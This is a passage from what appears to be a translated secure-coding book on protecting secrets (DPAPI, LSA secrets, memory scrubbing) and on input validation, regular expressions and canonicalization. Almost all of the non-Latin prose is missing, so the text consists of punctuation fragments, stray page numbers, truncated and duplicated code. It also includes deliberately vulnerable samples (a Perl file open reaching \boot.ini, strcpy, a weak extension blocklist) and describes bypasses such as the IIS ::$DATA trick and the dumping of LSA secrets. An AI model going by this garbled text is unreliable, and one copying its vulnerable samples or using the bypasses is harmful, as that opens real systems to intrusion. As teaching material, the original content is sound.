DPAPI ( Secureco2\Chap
ter09\DPAPI).
// .
DATA_BLOB blobIn;
blobIn.pbData = reinterpret_cast<BYTE *>("This is my secret data.";
blobIn.cbData = lstrlen(reinterpret_cast<char *>(blobIn.pbData))+1;
// .
DATA_BLOB blobEntropy;
blobEntropy.pbData = GetEntropyFromUser();
blobEntropy.cbData = lstrlen(
reinterpret_cast<char *>(blobEntropy.pbData));
// .
DATA_BLOB blobOut;
DWORD dwFlags = CRYPTPROTECT_AUDIT;
if(CryptProtectData(
&blobIn,
L"Writing Secure Code Example",
&blobEntropy,
NULL,
NULL,
dwFlags,
&blobOut))
{
printf(" .\n");
} else {
printf(" CryptProtectData() !> %x",
GetLastError());
265
exit(!1);
}
// .
DATA_BLOB blobVerify;
if (CryptUnprotectData(
&blobOut,
NULL,
&blobEntropy,
NULL,
NULL,
0,
&blobVerify)) {
printf(" : %s\n", blobVerify .pbData);
} else {
printf(" CryptUnprotectData() ! > %x",
GetLastError());
exit(!1);
}
LocalFree(blobOut.pbData);
LocalFree(blobVerify.pbData);
DPAPI Web
http://msdn.microsoft.com/library/enus/dnsecure/html/windatapro
tectiondpapi.asp.
: Windows XP
Windows XP Stored User Names and Passwords (
),
(
) .
, ,
. :
,
;
DPAPI;
,
.
Stored User Names and Passwords :
Windows .
, Kerberos.
SSPI (Security Support Provider Interface).
, ,
266
II
,
SQL.
(. Secureco2\Chapter09\Cred) ,
.
/*
Cred.cpp
*/
#include <stdio.h>
#include <windows.h>
#include <wincred.h>
CREDUI_INFO cui;
cui.cbSize = sizeof CREDUI_INFO;
cui.hwndParent = NULL;
cui.pszMessageText =
TEXT(",
Northwind Traders Accounts.");
cui.pszCaptionText = TEXT("Northwind Traders Accounts") ;
cui.hbmBanner = NULL;
PCTSTR pszTargetName = TEXT("NorthwindAccountsServer");
DWORD dwErrReason = 0;
Char pszName[CREDUI_MAX_USERNAME_LENGTH+1];
Char pszPwd[CREDUI_MAX_PASSWORD_LENGTH+1];
DWORD dwName = CREDUI_MAX_USERNAME_LENGTH;
DWORD dwPwd = CREDUI_MAX_PASSWORD_LENGTH;
BOOL fSave = FALSE;
DWORD dwFlags =
CREDUI_FLAGS_GENERIC_CREDENTIALS |
CREDUI_FLAGS_ALWAYS_SHOW_UI;
// .
ZeroMemory(pszName, dwName);
ZeroMemory(pszPwd, dwPwd);
DWORD err = CredUIPromptForCredentials(
&cui,
pszTargetName,
NULL,
dwErrReason,
pszName,dwName,
pszPwd,dwPwd,
&fSave,
dwFlags);
if (err)
printf(" CredUIPromptForCredentials() !> %d",
GetLastError());
267
else {
// Northwind Traders Accounting
// pszName pszPwd .
}
, . 91. :
,
( NorthwindAccountsServer) DPAPI.
Windows NT 4
Windows NT 4 DPAPI, CryptoAPI ACL.
.
1. CryptGenRandom .
2. .
3. ACL Creator/Owner Admi
nistrators.
4. ,
ACE (SACL), .
. ,
268
II
. ,
, .
, LSA (
LsaStorePrivateData LsaRetrievePrivateData). LSA
: , , .
( ),
. .
LSA L$. LSA,
,
. LSA G$.
LSA
, M$. (private) LSA,
, .
,
. ,
SC_. ,
, LsaStorePrivateData
MSDN.
LSA DPAPI
, :
LSA 4096 , DPAPI
;
LSA ,
DPAPI ;
DPAPI , LSA
;
LSA , DPAPI
, , ;
LSA,
. DPAPI
, ACL,
.
LSA,
LSA. C++,
:
// LSASecrets.cpp : .
#include <windows.h>
#include <stdio.h>
#include "ntsecapi.h"
bool InitUnicodeString(LSA_UNICODE_STRING* pUs, const WCHAR* input){
DWORD len = 0;
if(!pUs)
269
return false;
if(input){
len = wcslen(input);
if(len > 0x7ffe) // 32k, FALSE;
}
pUs!>Buffer = (WCHAR*)input;
pUs!>Length = (USHORT)len * sizeof(WCHAR);
pUs!>MaximumLength = (USHORT)(len + 1) * sizeof(WCHAR);
return true;
}
LSA_HANDLE GetLSAPolicyHandle(WCHAR *wszSystemName) {
LSA_OBJECT_ATTRIBUTES ObjectAttributes;
ZeroMemory(&ObjectAttributes, sizeof(ObjectAttributes));
LSA_UNICODE_STRING lusSystemName;
if(!InitUnicodeString(&lusSystemName, wszSystemName))return NULL;
LSA_HANDLE hLSAPolicy = NULL;
NTSTATUS ntsResult = LsaOpenPolicy(&lusSystemName,&ObjectAttributes,
POLICY_ALL_ACCESS,
&hLSAPolicy);
DWORD dwStatus = LsaNtStatusToWinError(ntsResult);
if (dwStatus != ERROR_SUCCESS) {
wprintf(L"OpenPolicy returned %lu\n",dwStatus);
return NULL;
}
return hLSAPolicy;
}
(. Secureco2\Chapter09\LSASecrets) ,
LSA :
270
II
{
LSA_UNICODE_STRING lucName;
if(!InitUnicodeString(&lucName, wszName))
return ERROR_INVALID_PARAMETER;
PLSA_UNICODE_STRING plucSecret = NULL;
NTSTATUS ntsResult = LsaRetrievePrivateData(hLSA,
&lucName, &plucSecret);
DWORD dwStatus = LsaNtStatusToWinError(ntsResult);
if (dwStatus != ERROR_SUCCESS)
wprintf(L" %lu\n",dwStatus);
else
wcsncpy(wszSecret, plucSecret!>Buffer,
min((plucSecret!>Length)/sizeof WCHAR,dwBuffLen));
if (plucSecret)
LsaFreeMemory(plucSecret);
return dwStatus;
}
int main(int argc, char* argv[]) {
LSA_HANDLE hLSA = GetLSAPolicyHandle(NULL);
WCHAR *wszName = L"L$WritingSecureCode";
WCHAR *wszSecret = L"My Secret Data!";
if (WriteLsaSecret(hLSA, wszSecret, wszName) == ERROR_SUCCESS) {
WCHAR wszSecretRead[128];
if (ReadLsaSecret(hLSA,sizeof wszSecretRead / sizeof WCHAR,
wszSecretRead,wszName) == ERROR_SUCCESS)
wprintf(L" LSA '%s' '%s'\n",wszName,wszSecretRead);
}
if (hLSA) LsaClose(hLSA);
return 0;
}
LSA, LsaStorePrivateData NULL.
, LSA,
, LSADUMP2.exe,
BindView (http://razor.bindview.com/tools/desc/lsadump2_
readme.html). ,
!
Windows 95/98/Me
Windows CE
Windows 95/98/Me Windows CE (
) CryptoAPI, ACL.
, ,
, ? ?
271
ACL? .
.
, , Windows NT 4 Windows 2000/XP.
, ( )
Windows 95/98/Me Windows CE ,
.
Crypt
GenRandom, ,
, , , ,
.. ,
.
, ,
, .
,
. :
.
, ,
.
HKEY_LOCAL_MACHINE\HARDWARE Windows 95/98/Me
, .
, , . ,
.
PnP
Plug and Play Windows 98, Windows 2000
. ,
,
. , :
,
SHA1,
. Web
http://msdn.microsoft.com/library/enus/devio/deviceman_7u9f.asp.
#include "windows.h"
#include "wincrypt.h"
#include "initguid.h"
#include "Setupapi.h"
#include "winioctl.h"
#include "strsafe.h"
// (DDK),
// !
DEFINE_GUID( GUID_DEVCLASS_CDROM,
\
0x4d36e965L, 0xe325, 0x11ce, 0xbf, 0xc1,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18 );
DEFINE_GUID( GUID_DEVCLASS_NET, \
0x4d36e972L, 0xe325, 0x11ce, 0xbf, 0xc1,
272
II
);
0xc1,
);
0xc1,
);
0xc1,
);
0xc1,
);
0x56,
);
0xc1,
);
0xc1,
);
0xcc,
);
if (SetupDiGetDeviceRegistryProperty(hDevInfo,
&did,
SPDRP_HARDWAREID,
&dwRegType,
(PBYTE)Buff,
cBuff,
&cNeeded))
// , .
if (cData > cNeeded) {
StringCchCat(szData,cData,"\n\t");
StringCchCat(szData,cData,Buff);
}
}
return 0;
}
DWORD CreateHashFromPnPStuff(HCRYPTHASH hHash) {
struct {
LPGUID guid;
_TCHAR *szDevice;
} device [] =
{
{(LPGUID)&GUID_DEVCLASS_CDROM, "CD"},
{(LPGUID)&GUID_DEVCLASS_DISPLAY, "VDU"},
{(LPGUID)&GUID_DEVCLASS_NET, "NET"},
{(LPGUID)&GUID_DEVCLASS_KEYBOARD, "KBD"},
{(LPGUID)&GUID_DEVCLASS_MOUSE, "MOU"},
{(LPGUID)&GUID_DEVCLASS_USB, "USB"},
{(LPGUID)&GUID_DEVCLASS_PROCESSOR,"CPU"}
};
const DWORD cData = 4096;
TCHAR *pData = new TCHAR[cData];
if (!pData)
return ERROR_NOT_ENOUGH_MEMORY;
DWORD dwErr = 0;
for (int i=0; i < sizeof(device)/sizeof(device[0]); i++) {
ZeroMemory(pData,cData);
if (GetPnPStuff(device[i].guid,pData,cData) == 0) {
#ifdef _DEBUG
printf("%s: %s\n",device[i].szDevice, pData);
#endif
if (!CryptHashData(hHash,
(LPBYTE)pData, lstrlen(pData), 0)) {
dwErr = GetLastError();
273
274
II
break;
}
} else {
dwErr = GetLastError();
}
}
delete [] pData;
return dwErr;
}
int _tmain(int argc, _TCHAR* argv[]) {
HCRYPTPROV hProv = NULL;
HCRYPTHASH hHash = NULL;
if (CryptAcquireContext
(&hProv,NULL,NULL,PROV_RSA_FULL,CRYPT_VERIFYCONTEXT)) {
if (CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash)) {
if (CreateHashFromPnPStuff(hHash) == 0) {
// .
BYTE hash[20];
DWORD cbHash = 20;
if (CryptGetHashParam
(hHash,HP_HASHVAL,hash,&cbHash,0)) {
for (DWORD i=0; i < cbHash; i++) {
printf("%02X",hash[i]);
}
}
}
}
}
if (hHash)
CryptDestroyHash(hHash);
if (hProv)
CryptReleaseContext(hProv, 0);
}
if (hHash)
CryptDestroyHash(hHash);
if (hProv)
CryptReleaseContext(hProv, 0);
}
275
. ,
, .
!
,
,
. :
.
,
,
.
, Windows
.
ACL,
. ,
Windows NT 4 ,
?
, Windows NT 4, Windows 2000
API .
, ,
, ,
,
. , Win
dows NT, Windows 2000 , Win
dows 2000 DPAPI, Windows NT 4 LSA.
// CryptProtectData.
typedef BOOL (WINAPI CALLBACK* CPD)
(DATA_BLOB*,LPCWSTR,DATA_BLOB*,
PVOID,CRYPTPROTECT_PROMPTSTRUCT*,DWORD,DATA_BLOB*);
// CryptUnprotectData.
typedef BOOL (WINAPI CALLBACK* CUD)
(DATA_BLOB*,LPWSTR,DATA_BLOB*,
PVOID,CRYPTPROTECT_PROMPTSTRUCT*,DWORD,DATA_BLOB*);
HRESULT EncryptData(LPCTSTR szPlaintext) {
HRESULT hr = S_OK;
HMODULE hMod = LoadLibrary(_T("crypt32.dll"));
if (!hMod)
return HRESULT_FROM_WIN32(GetLastError());
CPD cpd = (CPD)GetProcAddress(hMod,_T("CryptProtectData"));
276
II
if (cpd) {
// DPAPI cpd ;
// ,
// ACL.
} else {
// API! LSA.
}
FreeLibrary(hMod);
return hr;
}
:
;
;
;
.
,
. ,
. , , ,
, ,
. ,
.
,
( ) memset ZeroMemory,
memset:
void *p = malloc(N);
...
size_t cb = _msize(p);
memset(p,0,cb);
277
...
C C++
. ,
, ..
(dead code). , ,
, ,
, . :
; 30
; 31
; 32
:
:
push
mov
lea
push
call
add
test
je
; 33
278
II
mov
lea
push
push
call
add
$L1344:
;
;
;
;
;
;
;
34
35
36
37
38
39
40
:
// , .
:
// .
:
}
:
}
:
:
ZeroMemory(szPwd,sizeof(szPwd));
: }
mov
ecx, DWORD PTR __$ArrayPad$[esp+68]
xor
ecx, DWORD PTR __$ReturnAddr$[esp+64]
add
esp, 68; 00000044H
jmp
@__security_check_cookie@4
DatabaseConnect ENDP
30
/GS, cookie (stackbased
cookie). ( 5.) 3440
, 30 cookie
. ?
_memset. ( , ZeroMemory ,
memset.)
,
. ,
if ,
.
,
. ,
, (
)
. ,
,
(control flow graph),
. ,
.
(dead store elimination).
, ,
(AS IF rule), .
279
, , ,
.
,
,
.
, .
Visual C++ ,
, .
, ,
, , , szPwd
, .
Microsoft Visual C++ 6 7, GNU C (GCC) 3.x.
,
. Windows Security Push (. 2)
(inline) ZeroMemory SecureZeroMemory,
. (
winbase.h):
#ifndef FORCEINLINE
#if (MSC_VER >= 1200)
#define FORCEINLINE __forceinline
#else
#define FORCEINLINE __inline
#endif
#endif
...
FORCEINLINE PVOID SecureZeroMemory(
void *ptr, size_t cnt) {
volatile char *vptr = (volatile char *)ptr;
while (cnt) {
*vptr = 0;
vptr++;
cnt!!;
}
return ptr;
}
,
Windows. :
ZeroMemory memset
.
,
!
memset
. ,
, . ,
280
II
volatile,
.
, ZeroMemory :
#pragma optimize("",off)
// .
#pragma optimize("",on)
.
Og ( Ox,
O1 O2) Visual C++ .
, #pragma.
, , ,
.
.
CryptoAPI.
.
Windows .NET Server 2003 API, CryptProtect
Memory CryptUnprotectMemory; DPAPI,
.
,
, . ,
. .
#include <wincrypt.h>
#define SECRET_LEN 15 // null.
HRESULT hr = S_OK;
LPWSTR pSensitiveText = NULL;
DWORD cbSensitiveText = 0;
DWORD cbPlainText = SECRET_LEN * sizeof(WCHAR);
DWORD dwMod = 0;
281
//
// CYPTPROTECTMEMORY_BLOCK_SIZE.
if (dwMod = cbPlainText % CRYPTPROTECTMEMORY_BLOCK_SIZE)
cbSensitiveText = cbPlainText + (CRYPTPROTECTMEMORY_BLOCK_SIZE ! dwMod);
else
cbSensitiveText = cbPlainText;
pSensitiveText = (LPWSTR)LocalAlloc(LPTR, cbSensitiveText);
if (NULL == pSensitiveText)
return E_OUTOFMEMORY;
// pSensitiveText,
// .
if (!CryptProtectMemory(pSensitiveText,
cbSensitiveText,
CRYPTPROTECTMEMORY_SAME_PROCESS)) {
// .
SecureZeroMemory(pSensitiveText, cbSensitiveText);
LocalFree(pSensitiveText);
pSensitiveText = NULL;
return GetLastError();
}
// CryptUnprotectMemory .
...
// .
SecureZeroMemory(pSensitiveText, cbSensitiveText);
LocalFree(pSensitiveText);
pSensitiveText = NULL;
return hr;
Platform SDK.
,
.
, .
( , AllocateUserPhysicalPages VirtualLock)
.
,
, (hibernate
mode) , ,
.
282
II
VirtualLock
API VirtualLock Windows NT 4
.
.
( , ,
, ),
.
, .
.
,
.
, , ! , ,
, ,
.
,
.
.
( ,
). , :
,
;
,
, ,
. :
, , ,
, .
(common language runtime, CLR) .NET .NET
Framework
, XML
! .NET
XCOPY,
. DLL
,
! ,
,
283
, .
.
, . ,
XCOPY , ,
, .
, ,
.
// DataProtection.cs
namespace Microsoft.Samples.DPAPI {
using System;
using System.Runtime.InteropServices;
using System.Text;
public class DataProtection {
// ,
// Base!64.
public static string ProtectData(string data,
string name,
int flags) {
byte[] dataIn = Encoding.Unicode.GetBytes(data);
byte[] dataOut = ProtectData(dataIn, name, flags);
return (null != dataOut)
? Convert.ToBase64String(dataOut)
: null;
}
// Base!64
284
II
// .
public static string UnprotectData(string data) {
byte[] dataIn = Convert.FromBase64String(data);
byte[] dataOut = UnprotectData(dataIn,
NativeMethods.UIForbidden |
NativeMethods.VerifyProtection);
return (null != dataOut)
? Encoding.Unicode.GetString(dataOut)
: null;
}
////////////////////////
// //
////////////////////////
internal static byte[] ProtectData(byte[] data,
string name,
int dwFlags) {
byte[] cipherText = null;
// .
NativeMethods.DATA_BLOB din =
new NativeMethods.DATA_BLOB();
din.cbData = data.Length;
din.pbData = Marshal.AllocHGlobal(din.cbData);
Marshal.Copy(data, 0, din.pbData, din.cbData);
NativeMethods.DATA_BLOB dout =
new NativeMethods.DATA_BLOB();
NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps =
new NativeMethods.CRYPTPROTECT_PROMPTSTRUCT();
// DPAPI.
InitPromptstruct(ref ps);
try {
bool ret =
NativeMethods.CryptProtectData(
ref din,
name,
NativeMethods.NullPtr,
NativeMethods.NullPtr,
ref ps,
dwFlags, ref dout);
if (ret) {
cipherText = new byte[dout.cbData];
Marshal.Copy(dout.pbData,
cipherText, 0, dout.cbData);
NativeMethods.LocalFree(dout.pbData);
} else {
#if (DEBUG)
Console.WriteLine(" : " +
Marshal.GetLastWin32Error().ToString());
#endif
}
}
finally {
if ( din.pbData != IntPtr.Zero )
Marshal.FreeHGlobal(din.pbData);
}
return cipherText;
}
internal static byte[] UnprotectData(byte[] data,
int dwFlags) {
byte[] clearText = null;
// .
NativeMethods.DATA_BLOB din =
new NativeMethods.DATA_BLOB();
din.cbData = data.Length;
din.pbData = Marshal.AllocHGlobal(din.cbData);
Marshal.Copy(data, 0, din.pbData, din.cbData);
NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps =
new NativeMethods.CRYPTPROTECT_PROMPTSTRUCT();
InitPromptstruct(ref ps);
NativeMethods.DATA_BLOB dout =
new NativeMethods.DATA_BLOB();
try {
bool ret =
NativeMethods.CryptUnprotectData(
ref din,
null,
NativeMethods.NullPtr,
NativeMethods.NullPtr,
ref ps,
dwFlags,
ref dout);
if (ret) {
clearText = new byte[ dout.cbData ] ;
Marshal.Copy(dout.pbData,
clearText, 0, dout.cbData);
NativeMethods.LocalFree(dout.pbData);
285
286
II
} else {
#if (DEBUG)
Console.WriteLine(" : " +
Marshal.GetLastWin32Error().ToString());
#endif
}
}
finally {
if ( din.pbData != IntPtr.Zero )
Marshal.FreeHGlobal(din.pbData);
}
return clearText;
}
static internal void InitPromptstruct(
ref NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps) {
ps.cbSize = Marshal.SizeOf(
typeof(NativeMethods.CRYPTPROTECT_PROMPTSTRUCT));
ps.dwPromptFlags = 0;
ps.hwndApp = NativeMethods.NullPtr;
ps.szPrompt = null;
}
}
}
C# , DataPro
tection:
using Microsoft.Samples.DPAPI;
using System;
using System.Text;
class TestStub {
public static void Main(string[] args) {
string data = ", .";
string name="MySecret";
Console.WriteLine(" : " + data);
string s = DataProtection.ProtectData(data,
name,
NativeMethods.UIForbidden);
if (null == s) {
Console.WriteLine(" ");
return;
}
Console.WriteLine(" : " + s);
s = DataProtection.UnprotectData(s);
Console.WriteLine(" : " + s);
}
}
287
COM+;
, COM+.
.
System.EnterpriseServices.
.
COM+ C#
. .
: +
SN.exe, c:\keys\DemoSrv.snk,
. (strong
named assemblies) 18.
using
using
using
using
System;
System.Reflection;
System.Security.Principal;
System.EnterpriseServices;
[assembly:
[assembly:
[assembly:
[assembly:
ApplicationName("ConstructDemo")]
ApplicationActivation(ActivationOption.Library)]
ApplicationAccessControl]
AssemblyKeyFile(@"c:\keys\DemoSrv.snk")]
namespace DemoSrv {
[ComponentAccessControl]
[SecurityRole("DemoRole", SetEveryoneAccess = true)]
// .
[ConstructionEnabled(Default="Set new data.")]
public class DemoComp : ServicedComponent {
private string _construct;
override protected void Construct(string s) {
_construct = s;
}
public string GetConstructString() {
return _construct;
}
}
}
Microsoft ASP.NET ,
:
288
II
Component
Services ( ) (. 92). Sys
tem.EnterpriseServices Web http://msdn.microsoft.com/
msdnmag/issues/01/10/complus/complus.asp.
. 92.
COM+
: ,
. :
.NET .
.
, . C#, ErasableData,
.
,
.
.
set {
// .
_ph = GCHandle.Alloc(_rbSecret, GCHandleType.Pinned);
// .
byte[] Data = value;
Array.Copy (Data, _rbSecret, Data.Length);
}
get {
return _rbSecret;
}
}
}
class DriverClass {
static void Main(string[] args) {
if (args.Length == 0) {
// !
return;
}
// .
byte [] plaintext =
new UTF8Encoding().GetBytes(args[0]);
// .
using (ErasableData key = new ErasableData(16)) {
key.Data = GetSecretFromUser();
Rijndael aes = Rijndael.Create();
aes.Key = key.Data;
MemoryStream cipherTextStream = new MemoryStream();
CryptoStream cryptoStream = new CryptoStream(
cipherTextStream,
aes.CreateEncryptor(),
CryptoStreamMode.Write);
cryptoStream.Write(plaintext, 0, plaintext.Length);
cryptoStream.FlushFinalBlock();
cryptoStream.Close();
// (IV).
byte [] ciphertext = cipherTextStream.ToArray();
byte [] IV = aes.IV;
// , .
aes.Clear();
cryptoStream.Clear();
}
}
}
289
290
II
:
IDisposable. using C#
, , Dispose.
aes.Clear cryptoStream.Clear. Clear
.
Password,
C#.
, (
) ( )
. Secret.txt. ,
.
FAT-
(
XML)
Web.
: ,
.
XOR
,
XOR. ,
, ,
. ,
, Microsoft Word GIF.
,
XOR .
3DES
, ,
3DES (TripleDES).
: ,
.
3DES
,
, .
, .
, , , , ,
, .
291
3DES
,
, .
, . , ,
.
3DES ,
,
ACL
ACL (
),
, . ,
,
. , ,
, ( )
. , !
? .
3DES,
, ,
ACL
.
,
, . ,
. ,
, .
, .
,
. ,
,
nCipher (http://www.ncipher.com).
,
. :
;
, ;
.
, ,
.
, .
292
II
. :
! . 91
; .
9-1. ,
( ,
)
, :
!
COM+
LSA
DPAPI ( )
DPAPI ( )
. ,
.
,
,
, .
, .
.
10
!
,
? , .
?
, ,
. :
, .
. :
, .
. .
:
.
, ,
,
. , .
?
, ,
, ,
. ,
, ,
, ?
: ,
? ,
.
294
II
: ,
Web. ,
,
. , ,
,
, ,
,
/. ,
, ,
. ,
, .
.
.
!
, !
,
, .
, ,
, ,
Web, .
.
,
,
,
. !
:
,
.
,
,
. ,
. ,
, , .
. ?
? (cross
site scripting) 13.
10
295
,
:
? ?
. :
( !);
;
.
. ?
strcpy(cDest, szData);
strcpy
. 101.
,
szData cDect
, strcpy
, , ,
, . strcpy
, ,
, !
,
296
II
ACL , . ,
, .
, ,
. ,
:
, ,
.
:
,
. :
;
(chokepoint) .
10
297
, ,
, .
,
, , .
, ,
.
, .
, .
; ,
(). ,
, (Web,
, , ..),
, ,
.
! , DLL,
ActiveX ,
.
, .
, ,
.
, (. 102).
. 102.
298
II
,
,
.
.
Web ,
(crosssite scripting): ( HTML
) Web.
13. Web
,
. 2001 .
Web, .
Web : ,
( ), ,
. .
, ,
Web , !
.
.
,
: , .
3
,
. ,
. :
;
.
11:
,
.
.
.
. ,
.
, .
.
10
299
char *szLCase
= _strlwr(_strdup(szFilename));
for (int i=0;
i < sizeof(szBadExt) / sizeof(szBadExt[0]);
i++)
if (szLCase[cFilename!1] == szBadExt[i][3] &&
szLCase[cFilename!2] == szBadExt[i][2] &&
szLCase[cFilename!3] == szBadExt[i][1] &&
szLCase[cFilename!4] == szBadExt[i][0])
fIsBad = true;
}
}
return fIsBad;
}
bool CheckFileExtension(char *szFilename) {
if (!IsBadExtension(szFilename))
if (UploadUserFile(szFilename))
NotifyUserUploadOK(szFilename);
}
? IsBadExtension
.
: , , .
, Perl (.pl)
, Windows Scripting Host (.wsh, .js .vbs),
.
, Microsoft Office
(.doc, .xls ..),
. .
.
Web,
. :
300
II
Perl
Perl :
(tainted), ,
.
(, ) Perl .
:
use strict;
my $filename = <STDIN>;
open (FILENAME, ">> " . $filename) or die $!;
print FILENAME "Hello!";
close FILENAME;
, ,
. \boot.ini.
(T) Perl ,
open:
use strict;
my $filename = <STDIN>;
$filename =~ /(\w{1,8}\.log)/;
open (FILENAME, ">> " . $1) or die $!;
print FILENAME "Hello!";
close FILENAME;
10
301
.
8 .log.
(
), $1,
open. Perl ,
(, /(.*)/ ),
.
, .
.
, . C#
, C++.
RegularExpressions .NET Framework.
using System.Text.RegularExpressions;
...
static bool IsOKExtension(string Filename) {
Regex r =
new Regex(@"txt|rtf|gif|jpg|bmp$",
RegexOptions.IgnoreCase);
return r.Match(Filename).Success;
}
Perl :
sub isOkExtension($) {
$_ = shift;
return /txt|rtf|gif|jpg|bmp$/i ? !1 : 0;
}
, ,
. txt|rtf|gif|jpg|bmp$.
. 101.
10-1.
xxx|yyy
xxx yyy
,
, true. ,
C# RegexOptions.IgnoreCase, Microsoft Windows
.
. 102
. ,
.
302
II
10-2.
.
, {0,}
.
, {1,}
.
, {0,1}
{n}
{n,}
{,m}
{n,m}
n, m
\n
(<>)
() .
.
, (xx)+ ,
, . ,
(?:xx),
aa|bb
aa bb
[abc]
: a, b c
[^abc]
[az]
.
a z
.
(\n \/),
(\d).
() (\1)
\b
\B
\d
. , [09]
\D
. , [^09]
: , ,
,
\p{<>} Unicode;
\s
; , [\f\n\r\t\v]
\S
, ; , [^\f\n\r\t\v]
\w
() ; , [azAZ09_]
\W
( ) ;
, [^azAZ09_]
\xnn \x{nn}
, , nn
\unnnn
\x{nnnn}
Unicode,
, nnnn. ,
( 14)
10
303
(. 103).
10-3.
[afAF09]+
<(.*)>.*<\/\1>
HTML. : (.*)
(\1). , (.*)
FORM, \1 FORM
\d{5}(\d{4})?
^\w{1,32}(?:\.\w{0,4})? $
, . 1 32
,
0 4 .
,
, ?:
: ^ $
.
( )
. ,
( ) .
, , ,
, , .
. ,
:
RegExp r = [a!z]{1,8}\.[a!z]{1,3};
if (r.Match(strFilename).Success) {
// '! strFilename;
// .
} else {
// !!! .
}
, 18
, 13
( ). ?
? , c:\boot.ini?
, c:\boot.ini
boot.ini, . .
, :
^[a!z]{1,8}\.[a!z]{1,3}$
^ , $ .
: ( ) 1
8 , 13
, . , c:\boot.ini
, : \
.
304
II
Unicode
, 8
, ,
! Unicode?
, , ,
? ,
.
Unicode
Unicode Regular Expression Guidelines http://
www.unicode.org/reports/tr18.
Unicode .
Unicode
:
Unicode ( );
Unicode . Windows
UTF16 (little endian). ,
Windows ;
;
Unicode .
: ,
Unicode, , .
, Perl 5.8.0 Unicode.
.NET Framework Microsoft,
. ,
Unicode.
,
, . ,
:
;
( )
, . ,
? cafe?
,
\u30FB:
10
305
306
II
Z ( ):
Zs (, );
Zl ( U+2028, (U+00A6)
);
Zp ( U+2029);
O ():
Cc (, ,
, );
Cf ( , ,
);
Co ( , );
Cn ( );
Cs ( ).
Unicode
http://oss.software.ibm.com/developerworks/opensour
ce/icu/ubrowse.
. Web
,
. :
10
307
, Unicode
Unicode. Unicode http://www.unicode.org/
charts.
! :
.
, ,
!
*
,
.
,
.
V , : ,
.
.
, ,
, 1799 . . .
308
II
Perl C#,
.
, . (:
,
.)
Perl
Perl ,
.
Perl, :
var =~ /<>/;
, C#, C++, Microsoft Visual
Basic .NET, ASP.NET , .NET Framework
System.Text.RegularExpressions.
.
C#, Visual Basic .NET C++.
C#
// C#.
String s = @" 12:15 .";
Regex r = new Regex(@".*(\d{2}:\d{2}[ap]m)",RegexOptions.IgnoreCase);
if (r.Match(s).Success)
Console.Write(r.Match(s).Result("$1"));
10
309
If r.Match(s).Success Then
Console.Write(r.Match(s).Result("$1"))
End If
C++
// C++.
#using <mscorlib.dll>
#include <tchar.h>
#using <system.dll>
using namespace System;
using namespace System::Text;
using namespace System::Text::RegularExpressions;
...
String *s = S" 12:15 .";
Regex *r = new Regex(".*(\\d{2}:\\d{2}[ap]m)",IgnoreCase);
if (r!>Match(s)!>Success)
Console::WriteLine(r!>Match(s)!>Result(S"$1"));
ASP.NET ,
.
JavaScript 1.2
, Perl. 4, Netscape Navigator Microsoft
Internet Explorer .
var r = /.*(\d{2}:\d{2}[ap]m)/;
var s = " 12:15 .";
if (s.match(r))
alert(RegExp.$1);
VBScript 5
RegExp:
310
II
C++
! , C++
, ,
. STL (Standard
Template Library), STL Regex++ http://
www.boost.org ( http://www.ddj.com/documents/s=1486/ddj0110a/0110a.htm
.)
Microsoft Visual C++ Microsoft Visual Studio .NET
ATL , CAtlRegExp.
, Regex++ CAtlRegExp
;
, .
CAtlRegExp http://msdn.microsoft.com/library/enus/vclib/html/
vclrfcatlregexp.asp.
CAtlRegExp:
#include <AtlRX.h>
CAtlRegExp<> re;
re.Parse(".*{\\d\\d:\\d\\d[ap]m}",FALSE);
CAtlREMatchContext<> mc;
if (re.Match(" 12:15 .", &mc)) {
const CAtlREMatchContext<>::RECHAR* szStart = 0;
const CAtlREMatchContext<>::RECHAR* szEnd = 0;
mc.GetMatch(0,&szStart, &szEnd);
ptrdiff_t nLength = szEnd ! szStart;
printf("%.*s",nLength, szStart);
}
,
, , C++,
C# Visual Basic .NET. UserInput C++:
#include <string>
using namespace std;
class UserInput {
public:
UserInput(){};
~UserInput(){};
bool Init(const char* str) {
// .
if(!Validate(str)){
return false;
10
311
} else {
input = str;
return true;
}
}
const char* GetInput(){return input.c_str();}
DWORD Length(){return input.length();}
private:
bool Validate(const char* str);
string input;
};
. ,
,
UserInput, , . ,
Validate. Init ,
.
, Canonicalize.
,
.
,
, :
. ,
. :
.
,
;
. ,
,
. :
, .
,
, .
,
, , , .
11
,
: ,
, , , .
? , .
(Gertrude Stein), . ?
, ?
ROSE* : roze, ro$e, r0se r%6fse? ,
. , , ,
. , %6f
ASCII o.
?
: , ,
, ,
,
( ) .
(canonicalization)
,
.
, ,
,
Web
. , .
Rose . . .
11
313
, , .
(Johann Pachelbel) (16531706). Random House Websters
College Dictionary (Random House, 2000) :
. ,
,
.
,
. , c:\dir\test.dat, test.dat
..\..\test.dat .
c:\dir\test.dat. , , ,
.
, , ,
. ,
, . ,
. ,
, .
Napster
.
2001 ., ,
, Napster,
(Recording Industry Association of America, RIAA),
. Napster
, .
, :
, ,
Napster.
Siouxsie and the Banshees: Candyman AndymanCay (
), 92 degrees 92 degree$,
Deepest Chill Deepest Chi11. ,
, , ,
.
.
Web http://news.cnet.com/news/
010052005042145.html.
314
II
Mac OS X Apache
Web Apache, Mac OS X
Apple,
Hierarchical File System Plus (HFS+). HFS+ ,
Apache.
,
, . ,
scripts :
<Location /scripts>
order deny, allow
deny from all
</Location>
, http://www.northwindtra
ders.com/scripts/index.html, . http://
www.northwindtraders.com/SCRIPTS/index.html, Index.html
.
, HFS+,
, Apache, Mac OS X,
. , Apache SCRIPTS ,
scripts, . HFS+ SCRIPTS
scripts ,
index.html.
http://www.securityfocus.com/
archive/1/190036.
DOS
, MSDOS
Windows .
, , (aux)
(lpt1 prn). ,
Windows 95 Windows 98 . Windows
,
, .
http://www.microsoft.com/technet/security/bulletin/MS00017.asp.
/tmp
StarOffice Sun
,
UNIX Linux. (symbolic link, symlink)
, ; ,
. UNIX ,
(hard link). ,
symlink .
11
315
!
, !
Windows
Windows ,
.
,
, .
8.3
, , , FAT,
MSDOS, : 8
3 (, , ).
FAT32 NTFS , , NTFS
255 Unicode.
NTFS FAT32 8.3,
316
II
11
317
NTFS
,
: ,
. ,
.asp, IIS Asp.dll.
.asp::$DATA, IIS ,
NTFS, ASP.
, Streams.exe Sysinternals (http://www.sysinternals.com),
